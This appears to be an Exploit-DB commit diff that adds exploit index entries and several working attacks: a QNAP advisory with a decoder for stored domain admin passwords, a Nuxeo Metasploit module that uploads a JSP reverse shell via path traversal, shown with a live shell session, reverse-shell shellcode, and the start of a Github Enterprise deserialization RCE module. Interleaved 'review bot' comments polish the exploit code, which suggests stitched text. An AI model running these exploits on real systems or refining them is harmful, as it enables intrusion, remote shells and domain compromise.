DB: 2017-03-28
25 new exploits Samba < 3.6.2 (x86) - Denial of Serviec (PoC) Samba < 3.6.2 (x86) - Denial of Service (PoC) Microsoft Visual Studio 2015 update 3 - Denial of Service Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow Apple Safari - 'DateTimeFormat.format' Type Confusion Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode Apple Safari - Out-of-Bounds Read when Calling Bound Function QNAP QTS < 4.2.4 - Domain Privilege Escalation Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory Github Enterprise - Default Session Secret And Deserialization (Metasploit) B2B Alibaba Clone Script - SQL Injection B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection Just Another Video Script 1.4.3 - SQL Injection Adult Tube Video Script - SQL Injection Alibaba Clone Script - SQL Injection B2B Marketplace Script 2.0 - SQL Injection Php Real Estate Property Script - SQL Injection Courier Tracking Software 6.0 - SQL Injection Parcel Delivery Booking Script 1.0 - SQL Injection Delux Same Day Delivery Script 1.0 - SQL Injection Hotel Booking Script 1.0 - SQL Injection Tour Package Booking 1.0 - SQL Injection Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection CouponPHP CMS 3.1 - 'code' Parameter SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
This commit is contained in:
parent
d2c8c83204
commit
1f8c35c0c0
27 changed files with 1918 additions and 3 deletions
29
files.csv
29
files.csv
|
@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
|
|||
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
|
||||
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
|
||||
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
|
||||
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
|
||||
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0
|
||||
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
|
||||
36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
|
@ -5425,6 +5425,11 @@ id,file,description,date,author,platform,type,port
|
|||
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
|
||||
41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
|
||||
41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
|
||||
41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
|
||||
41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
|
||||
41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8887,6 +8892,7 @@ id,file,description,date,author,platform,type,port
|
|||
41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
|
||||
41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
|
||||
41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
|
||||
41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15390,6 +15396,9 @@ id,file,description,date,author,platform,type,port
|
|||
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
||||
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
||||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
|
||||
41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
|
||||
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
|
||||
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37261,7 +37270,7 @@ id,file,description,date,author,platform,type,port
|
|||
41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0
|
||||
41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
|
||||
41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0
|
||||
|
@ -37630,3 +37639,19 @@ id,file,description,date,author,platform,type,port
|
|||
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
|
||||
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41724,platforms/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41725,platforms/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps,0
|
||||
41726,platforms/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41727,platforms/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41728,platforms/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41729,platforms/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41730,platforms/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
|
||||
41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
|
||||
41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0
|
||||
41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0
|
||||
41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0
|
||||
41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0
|
||||
|
|
|
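--- a/platforms/hardware/local/41745.txt
+++ b/platforms/hardware/local/41745.txt
@@ -0,0 +1,215 @@
+QNAP QTS Domain Privilege Escalation Vulnerability
+
+Name Sensitive Data Exposure in QNAP QTS
+Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4
+Severity High 7.9/10
+Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
+Vendor http://www.qnap.com/
+Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt
+Authors Pasquale "sid" Fiorillo (sid AT ush DOT it)
+Guido "go" Oricchio (g.oricchio AT pcego DOT com)
+Date 20170322
+
+I. BACKGROUND
+
+QNAP Systems, founded in 2004, provides network attached storage (NAS)
+and network video recorder (NVR) solutions for home and business use to
+the global market.
+QNAP also delivers a cloud service, called myQNAPcloud, that allows
+users to access and manage the devices from anywhere.
+QTS is a QNAP devices proprietary firmware based on Linux.
+
+ISGroup (http://www.isgroup.biz/) is an Italian Information Security
+boutique, we found this 0day issue while supporting Guido Oricchio
+of PCego, a System Integrator, to secure a QNAP product for one of his
+customer.
+
+Responsible disclosure with Qnap: we contacted qnap on public security@
+contact and we escalate fast to their Security Researcher Myron Su on
+PGP emails.
+
+Prior vulnerabilities in QNAP:
+https://www.qnap.com/en/support/con_show.php?op=showone&cid=41
+
+Information to customers of the vulnerability is shown in their bulletin
+ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
+QTS 4.2.4 Build 20170313 includes security fixes for the following
+vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
+reported by Pasquale Fiorillo of the cyber security company ISGroup
+(www.isgroup.biz), a cyber security company, and Guido Oricchio of
+PCego (www.pcego.com), a system integrator.
+
+The latest version of the software at the time of writing can be
+obtained from:
+
+https://www.qnap.com/en-us/product_x_down/
+https://start.qnap.com/en/index.php
+https://www.qnap.com/
+
+II. DESCRIPTION
+
+The vulnerability allows a local QTS admin user, or other low privileged
+user, to access configuration file that includes a bad crypted Microsoft
+Domain Administrator password if the NAS was joined to a Microsoft
+Active Directory domain.
+
+The affected component is the "uLinux.conf" configuration file,
+created with a world-readable permission used to store a Domain
+Administrator password.
+
+Admin user can access the file using ssh that is enabled by default.
+Other users are not allowed to login, so they have to exploit a
+component, such as a web application, to run arbitrary command or
+arbitrary file read.
+
+TLDR: Anyone is able to read uLinux.conf file, world readable by
+default, can escalate to Domain Administrator if a NAS is a domain
+member.
+
+III. ANALYSIS
+
+QNAP QTS stores "uLinux.conf" configuration file in a directory
+accessible by "nobody" and with permission that make them readable by
+"nobody".
+
+If the NAS was joined to an Active Directory, such file contain a Domain
+Administrator user and password in an easily decrypt format.
+
+In older versions of QTS the Domain Admin's password was stored in
+plaintext.
+
+A) Config file readable by "nobody"
+
+[~] # ls -l /etc/config/uLinux.conf
+-rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf
+
+Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U,
+TS-469L, and TS-221. Access to the needed file are guaranteed to
+all the local users, such as httpdusr used to running web sites and
+web application hosted on the NAS.
+
+This expose all the information contained in the configuration file at
+risk and this is a violation of the principle of least privilege.
+
+https://en.wikipedia.org/wiki/Principle_of_least_privilege
+
+B) Weak encrypted password in the configuration file
+
+The Microsoft Active Directory Admin username and password are stored
+in the file obfuscated by a simple XOR cypher and base64 encoded.
+
+In this scenario, a Local File Read vulnerability could lead to full
+domain compromise given the fact that an attacker can re-use such
+credentials to authenticate against a Domain Controller with maximum
+privileges.
+
+The password field in the uLinux.conf has the following format:
+
+User = <username>
+Password = <base64>
+
+eg:
+User = Administrator
+Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
+
+The "<base64>" decoded is:
+
+sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
+00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## |
+00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C|
+00000019
+
+Each byte xored with \x62 is the hex ascii code of the plaintext char.
+Eg:
+\x03 ^ \x62 = \x61 (a)
+\x00 ^ \x62 = \x61 (b)
+...
+\x24 ^ \x62 = \x46 (F)
+\x43 ^ \x62 = \x21 (!)
+
+The plaintext password is: aabbccddeeffAABBCCDDEEFF!
+
+IV. EXPLOIT
+
+The following code can be used to decode the password:
+
+#!/usr/bin/php
+<?php
+$plaintext = str_split(base64_decode($argv[1]));
+foreach($plaintext as $chr) {
+echo chr(ord($chr)^0x62);
+}
+echo "\n";
+
+Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
+aabbccddeeffAABBCCDDEEFF!
+
+V. VENDOR RESPONSE
+Vendor released QTS 4.2.4 Build 20170313 that contains the proper
+security patch. At the time of this writing an official patch is
+currently available.
+
+VI. CVE INFORMATION
+
+Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
+Qnap it's referred as Case NAS-201703-21.
+
+VII. DISCLOSURE TIMELINE
+
+20161212 Bug discovered
+20170106 Request for CVE to Mitre
+20170106 Disclosure to security@qnap.com
+20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
+20170107 Details disclosure to Myron Su
+20170109 Got CVE-CVE-2017-5227 from cve-assign
+20170110 Myron Su confirm the vulnerability
+20170203 We asks for updates, no release date from vendor
+20170215 We extend the disclosure date as 28 Feb will not be met
+20170321 QNAP releases the QTS 4.2.4 Build 20170313
+20170322 Advisory disclosed to the public
+
+VIII. REFERENCES
+
+[1] Top 10 2013-A6-Sensitive Data Exposure
+https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
+
+[2] Access Control Cheat Sheet
+https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
+
+[3] https://forum.qnap.com/viewtopic.php?t=68317
+20121213 User reporting that the password was stored in plaintext in
+a world-readable file
+
+[4] https://www.qnap.com/en/support/con_show.php?cid=113
+Qnap Security Bullettin NAS-201703-21
+
+IX. CREDIT
+
+Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the
+discovery of this vulnerability.
+
+Pasquale "sid" Fiorillo
+web site: http://www.pasqualefiorillo.it/
+mail: sid AT ush DOT it
+
+Guido "go" Oricchio
+web site: http://www.pcego.com/
+mail: g.oricchio AT pcego DOT com
+
+X. LEGAL NOTICES
+
+Copyright (c) 2017 Pasquale "sid" Fiorillo
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.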
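Review bot: The worked XOR example in section III.B has an arithmetic slip on its second line: it reads `\x00 ^ \x62 = \x61 (b)`, but 0x00 XOR 0x62 is 0x62, so the line should be `\x00 ^ \x62 = \x62 (b)`; the other example lines and the final plaintext are consistent with 0x62. The disclosure timeline entry `20170109 Got CVE-CVE-2017-5227 from cve-assign` duplicates the `CVE-` prefix. The decoder in section IV reads `$argv[1]` without checking that an argument was given, so run bare it prints a single character rather than a usage error; a guard such as `if ($argc < 2) { fwrite(STDERR, "usage: decode.php <base64>\n"); exit(1); }` before the `str_split` line would make the sample self-explanatory.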
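--- a/platforms/jsp/webapps/41748.rb
+++ b/platforms/jsp/webapps/41748.rb
@@ -0,0 +1,216 @@
+=begin
+# Description
+
+Nuxeo Platform is a content management system for enterprises (CMS).
+It embeds an Apache Tomcat server, and can be managed through a web
+interface.
+
+One of its features allows authenticated users to import files to the
+platform.
+By crafting the upload request with a specific ``X-File-Name`` header,
+one can successfuly upload a file at an arbitrary location of the server
+file system.
+
+It is then possible to upload a JSP script to the root directory of the
+web application to execute commands on the remote host operating system.
+Setting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the
+``X-File-Name`` header is a way to do so.
+
+## Details
+
+**CVE ID**: CVE-2017-5869
+
+**Access Vector**: network
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-434
+
+**CVSS Base Score**: 8.8
+
+**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+
+# Proof of Concept
+
+Here is a metasploit module to exploit this vulnerability:
+
+=end
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "Nuxeo Platform File Upload RCE",
+'Description' => %q{
+The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,
+thanks to an upload module.
+},
+'License' => MSF_LICENSE,
+'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],
+'References' =>
+[
+['https://nuxeo.com/', '']
+],
+'Platform' => %w{linux},
+'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],
+'Arch' => ARCH_JAVA,
+'Privileged' => true,
+'Payload' => {},
+'DisclosureDate' => "",
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),
+OptString.new('USERNAME', [true, 'A valid username', '']),
+OptString.new('PASSWORD', [true, 'Password linked to the username', ''])
+], self.class)
+end
+
+def jsp_filename
+@jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'
+end
+
+def jsp_path
+'nxserver/nuxeo.war/' + jsp_filename
+end
+
+def nuxeo_login
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, '/login.jsp')
+)
+
+fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+session_cookie = res.get_cookies
+
+res = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),
+'cookie' => session_cookie,
+'vars_post' => {
+'user_name' => datastore['USERNAME'],
+'user_password' => datastore['PASSWORD'],
+'submit' => 'Connexion'
+}
+)
+return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')
+nil
+end
+
+def trigger_shell
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, jsp_filename)
+)
+fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200
+end
+
+def exploit
+print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+session_cookie = nuxeo_login
+if session_cookie
+payload_url = normalize_uri(target_uri.path, jsp_filename)
+res = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),
+'cookie' => session_cookie,
+'headers' => {
+'X-File-Name' => '../../' + jsp_path,
+'X-Batch-Id' => '00',
+'X-File-Size' => '1024',
+'X-File-Type' => '',
+'X-File-Idx' => '0',
+'X-Requested-With' => 'XMLHttpRequest'
+},
+'ctype' => '',
+'data' => payload.encoded
+)
+fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200
+print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.")
+trigger_shell
+else
+fail_with(Failure::Unknown, 'Unable to login')
+end
+end
+
+end
+
+=begin
+Module output:
+
+```bash
+msf> use exploit/multi/http/nuxeo
+msf exploit(nuxeo) > set USERNAME user1
+USERNAME => user1
+msf exploit(nuxeo) > set PASSWORD password
+PASSWORD => password
+msf exploit(nuxeo) > set rhost 192.168.253.132
+rhost => 192.168.253.132
+msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp
+payload => java/jsp_shell_reverse_tcp
+msf exploit(nuxeo) > set lhost 192.168.253.1
+lhost => 192.168.253.1
+msf exploit(nuxeo) > exploit
+
+[-] Handler failed to bind to 192.168.253.1:4444:- -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Authenticating using user1:password
+[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.
+[*] Command shell session 1 opened (172.17.0.2:4444 ->
+192.168.253.132:43279) at 2017-01-13 14:47:25 +0000
+
+id
+uid=1000(nuxeo) gid=1000(nuxeo)
+groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
+pwd
+/var/lib/nuxeo/server
+```
+
+# Vulnerable code
+
+The vulnerable code is located in the
+`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github
+link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),
+where the header ``X-File-Name`` is not checked.
+
+# Fix
+
+Nuxeo provided a
+[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)
+for this issue.
+A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).
+
+Please note that vulnerability does not affect Nuxeo versions above 7.3.
+
+# Affected versions
+
+* Nuxeo 6.0 (LTS 2014), released 2014-11-06
+* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15
+* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24
+* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24
+
+# Unaffected versions
+
+* Nuxeo 6.0 HF35, released 2017-01-12
+* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02
+* Nuxeo 7.10 (LTS 2015), released 2015-11-09
+* Nuxeo 8.10 (LTS 2016), released 2016-12-06
+
+# Credits
+
+Ronan Kervella <r.kervella@sysdream.com>
+
+-- SYSDREAM Labs <labs@sysdream.com>
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/
+* Twitter: @sysdream
+=end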
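Review bot: The failure message in `trigger_shell` never interpolates: `fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}')` is single-quoted, so the operator sees the literal text `#{full_uri}/#{jsp_filename}`; it should read `fail_with(Failure::Unknown, "Unable to get #{full_uri}/#{jsp_filename}")`. In `exploit`, `print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}")` echoes the password into the console and any session log (the sample output at the bottom of the file shows it verbatim), which nothing in the module needs; `print_status("Authenticating as #{datastore['USERNAME']}")` is sufficient. The module metadata is also incomplete: `'DisclosureDate' => ""` is empty and `'References'` lists only the vendor home page although the =begin header names CVE-2017-5869, so `['CVE', '2017-5869']` belongs in that array. As a point of style, `Failure::Unknown` is used both for a non-200 upload reply and for a failed login, where `Failure::UnexpectedReply` and `Failure::NoAccess` describe those outcomes more precisely.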
|
@ -2,7 +2,6 @@
|
|||
; File name: reversebash.nasm
|
||||
; Author: Jasmin Landry (@JR0ch17)
|
||||
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
|
||||
; To change
|
||||
; Shellcode length: 110 bytes
|
||||
; Tested on Ubuntu 12.04.5 32-bit (x86)
|
||||
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
|
||||
|
|
195
platforms/linux/remote/41744.rb
Executable file
195
platforms/linux/remote/41744.rb
Executable file
|
@ -0,0 +1,195 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.
|
||||
The first is that the session management uses a hard-coded secret value, which can be
|
||||
abused to sign a serialized malicious Ruby object. The second problem is due to the
|
||||
use of unsafe deserialization, which allows the malicious Ruby object to be loaded,
|
||||
and results in arbitrary remote code execution.
|
||||
|
||||
This exploit was tested against version 2.8.0.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'iblue <iblue[at]exablue.de>', # Original discovery, writeup, and PoC (he did it all!)
|
||||
'sinn3r' # Porting the PoC to Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '41616' ],
|
||||
[ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ],
|
||||
[ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Github Enterprise 2.8', { } ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 8443
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Mar 15 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def secret
|
||||
'641dd6454584ddabfed6342cc66281fb'
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path, 'setup', 'unlock')
